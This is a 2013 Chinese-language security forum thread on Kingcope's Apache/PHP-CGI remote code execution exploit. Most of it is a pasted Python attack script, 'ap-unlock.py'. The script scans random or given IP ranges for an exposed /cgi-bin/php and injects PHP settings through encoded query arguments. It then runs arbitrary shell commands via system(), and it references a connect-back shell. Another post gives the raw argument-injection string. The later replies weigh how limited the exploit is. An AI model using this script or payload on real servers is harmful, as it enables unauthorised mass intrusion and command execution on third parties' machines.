Apache / PHP 5.x Remote Code Execution Exploit (Kingcope出品)
http://www.exploit-db.com/exploits/29290/
http://www.exploit-db.com/exploits/29290/
sex is not show | 2013-10-30 10:15
好像很不错的样子
灬相随灬 (大胆天下去得,小心寸步难行。) | 2013-10-30 10:15
看不懂
楼上是马甲 | 2013-10-30 10:20
瞎猜下:
估计centos也有这种问题,只是影响太大,所以不公布
小胖子 | 2013-10-30 10:22
这个吊炸天!
GaRY | 2013-10-30 10:27
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
小胖子 | 2013-10-30 10:27
猪哥每天有刷新EDB的习惯?哈哈
园长 (喵~) | 2013-10-30 10:28
Kingcope出品
noah | 2013-10-30 10:28
猜想应该是RSS订阅
y35u (新手上路) | 2013-10-30 10:34
!/usr/bin/env python
#
# ap-unlock.py – apache + php 5.* rem0te c0de execution 0day
#
# NOTE:
# – quick’n’dirty
# – ‘-x’ is missing. copy&paste connect-back shell php code from kingcope’s
# exploit: http://www.exploit-db.com/exploits/29290/
# – scanner is not multithreaded. as alternative use:
# ./pnscan -L10000 -w”GET /cgi-bin/php HTTP/1.0\r\n\r\n” -r “500
# Internal” <cidrrange> 80 | grep Apache (or get *scan, harhar)
#
# by noptrix – http://nullsecurity.net/
import sys
import socket
import argparse
import threading
import time
import random
import select
t3st = ‘POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D’ \
‘%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73’ \
‘%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+’ \
‘%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+’\
‘%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n’\
‘Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n’
def enc0dez():
n33dz1 = (‘cgi-bin’, ‘php’)
n33dz2 = (‘-d’, ‘allow_url_include=on’, ‘-d’, ‘safe_mode=off’, ‘-d’,
‘suhosin.simulation=on’, ‘-d’, ‘disable_functions=””‘, ‘-d’,
‘open_basedir=none’, ‘-d’, ‘auto_prepend_file=php://input’,
‘-d’, ‘cgi.force_redirect=0’, ‘-d’, ‘cgi.redirect_status_env=0’,
‘-d’, ‘auto_prepend_file=php://input’, ‘-n’)
fl4g = 0
arg5 = ”
p4th = ”
plus = ”
for x in n33dz2:
if fl4g == 1:
plus = ‘+’
arg5 = arg5 + plus + \
”.join(‘%’ + c.encode(‘utf-8’).encode(‘hex’) for c in x)
fl4g = 1
for x in n33dz1:
p4th = p4th + ‘/’ + \
”.join(‘%’ + c.encode(‘utf-8’).encode(‘hex’) for c in x)
return (p4th.upper(), arg5.upper())
def m4k3_p4yl0rd(p4yl0rd, vuln):
p4th, arg5 = enc0dez()
if vuln:
p4yl0rd = t3st
else:
p4yl0rd = ‘POST /’ + p4th + ‘?’ + arg5 + ‘ HTTP/1.1\r\n’ \
‘Host: ‘ + sys.argv[1] + ‘\r\n’ \
‘Content-Type: application/x-www-form-urlencoded\r\n’ \
‘Content-Length: ‘ + str(len(p4yl0rd)) + ‘\r\n\r\n’ + p4yl0rd
return p4yl0rd
def s3nd_sh1t(args, vuln):
pat = ‘<b>Parse error</b>:’
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(float(args.t))
res = s.connect_ex((args.h, int(args.p)))
if res == 0:
if vuln:
p4yl0rd = m4k3_p4yl0rd(”, vuln)
s.sendall(p4yl0rd)
data = s.recv(4096)
if pat in data:
print “[*] ” + args.h + ” vu1n”
return args.h
return
else:
p4yl0rd = m4k3_p4yl0rd(‘<? system(“‘ + args.c + ‘”); ?>’, vuln)
s.sendall(p4yl0rd)
while True:
rd, wd, ex = select.select([s], [], [], float(args.t))
if rd:
data = s.recv(4096)
sys.stdout.flush()
sys.stdout.write(data)
sys.stdout.write(‘\n’)
else:
return
#for line in s.makefile():
# print line,
except socket.error:
return
return
def m4k3_r4nd_1p4ddr(num):
h0sts = []
for x in range(int(num)):
h0sts.append(‘%d.%d.%d.%d’ % (random.randrange(0,255),
random.randrange(0,255), random.randrange(0,255),
random.randrange(0,255)))
return h0sts
def sc4n_r4ng3(rsa, rsb, args, vuln):
vu1nz = []
for i in range (rsa[0], rsb[0]):
for j in range (rsa[1], rsb[1]):
for k in range (rsa[2], rsb[2]):
for l in range(rsa[3], rsb[3]):
args.h = str(i) + “.” + str(j) + “.” + str(k) + “.” + str(l)
vu1nz.append(s3nd_sh1t(args, vuln))
time.sleep(0.005)
vu1nz = filter(None, vu1nz)
return vu1nz
def m4k3_ipv4_r4ng3(iprange):
a = tuple(part for part in iprange.split(‘.’))
rsa = (range(4))
rsb = (range(4))
for i in range(0,4):
ga = a[i].find(‘-‘)
if ga != -1:
rsa[i] = int(a[i][:ga])
rsb[i] = int(a[i][1+ga:]) + 1
else:
rsa[i] = int(a[i])
rsb[i] = int(a[i]) + 1
return (rsa, rsb)
def parse_args():
p = argparse.ArgumentParser(
usage=’\n\n ./ap-unlock.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]’ \
‘\n ./ap-unlock.py -r <4rg> | -R <4rg> [0pt1ons]’,
formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
opts = p.add_argument_group(‘0pt1ons’, ”)
opts.add_argument(‘-h’, metavar=’wh1t3h4tz.0rg’,
help=’| t3st s1ngle h0st f0r vu1n’)
opts.add_argument(‘-p’, default=80, metavar=’80’,
help=’| t4rg3t p0rt (d3fau1t: 80)’)
opts.add_argument(‘-c’, metavar=’\’uname -a;id\”,
help=’| s3nd c0mm4nds t0 h0st’)
opts.add_argument(‘-x’, metavar=’192.168.0.2 1337′,
help=’| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll’)
opts.add_argument(‘-s’, action=’store_true’,
help=’| t3st s1ngl3 h0st f0r vu1n’)
opts.add_argument(‘-r’, metavar=’133.1.3-7.7-37′,
help=’| sc4nz iP addr3ss r4ng3 f0r vu1n’)
opts.add_argument(‘-R’, metavar=’1337′,
help=’| sc4nz num r4nd0m h0st5 f0r vu1n’)
opts.add_argument(‘-t’, default=3, metavar=’3′,
help=’| t1me0ut in s3x (d3fau1t: 3)’)
opts.add_argument(‘-f’, metavar=’vu1n.lst’,
help=’| wr1t3 vu1n h0sts t0 f1l3′)
args = p.parse_args()
if not args.h and not args.r and not args.R:
p.print_help()
sys.exit(0)
return args
def m41n():
if __name__ == “__main__”:
print “–==[ ap-unlock.py by noptrix@nullsecurity.net ]==–“
vuln = 0
try:
args = parse_args()
if not args.t:
args.t = float(3)
if args.h:
if args.s:
print “[+] sc4nn1ng s1ngl3 h0st %s ” % (args.h)
vuln = 1
s3nd_sh1t(args, vuln)
elif args.c:
print “[+] s3nd1ng c0mm4ndz t0 h0st %s ” % (args.h)
s3nd_sh1t(args, vuln)
elif args.x:
print “[+] xpl0it1ng b0x %s ” % (args.h)
print “t0d0”
else:
print “[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch”
sys.exit(-1)
if args.r:
print “[+] sc4nn1ng r4ng3 %s ” % (args.r)
vuln = 1
rsa, rsb = m4k3_ipv4_r4ng3(args.r)
vu1nz = sc4n_r4ng3(rsa, rsb, args, vuln)
if args.R:
print “[+] sc4nn1ng %d r4nd0m b0xes” % (int(args.R))
vuln = 1
h0sts = m4k3_r4nd_1p4ddr(int(args.R))
for h0st in h0sts:
args.h = h0st
s3nd_sh1t(args, vuln)
except KeyboardInterrupt:
sys.stdout.flush()
sys.stderr.write(“\b\b[!] w4rn1ng: ab0rt3d bY us3r\n”)
raise SystemExit
if args.f:
if vu1nz:
f = open(args.f, “w”)
f.write(“\n”.join(vu1nz)+”\n”)
f.close()
else:
print “[-] 3rr0r: y0u fuck3d up dud3”
sys.exit(1)
print “[+] h0p3 1t h3lp3d”
m41n()
he1renyagao (无) | 2013-10-30 11:00
@y35u python版?
心伤的裤子 (心伤的,,裤子,,的伤心) | 2013-10-30 11:03
膜拜耶稣大神
pentest | 2013-10-30 11:09
标题怎么都不提php5-cgi 吓一跳
cnrstar (Be My Personal Best!) | 2013-10-30 11:26
太局限了。。尼玛,白高兴一场,很少有网站有/cgi-bin/目录
无敌L.t.H (……天百一爱恋考高:簿相色白产国) | 2013-10-30 11:40
局限性太大,可以说太鸡肋了。
s4msung (sb#163.net) | 2013-10-30 11:57
Kingcope出品那也个大鸡肋 On Debian and Ubuntu the vulnerability is present in the default install
of the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php
情深 (ส็็็็็็็็็็็็็็็็็็็็็็็็็) | 2013-10-30 14:41
条件有点苛刻,1、cve-2012-1823,2、默认安装的cgi,3、可以访问到那几个路径; 既然有cve-2012-1823直接远程包含一个不可以吗?
Sogili (.) 长短短 (.) | 2013-10-30 14:51
kingcope本来就是鸡肋大王嘛。。。
BadCat (悲剧的我什么都不会……) | 2013-10-30 19:23
话说…太鸡助了 ==
生活累,一小半源于生存,一大半源于攀比。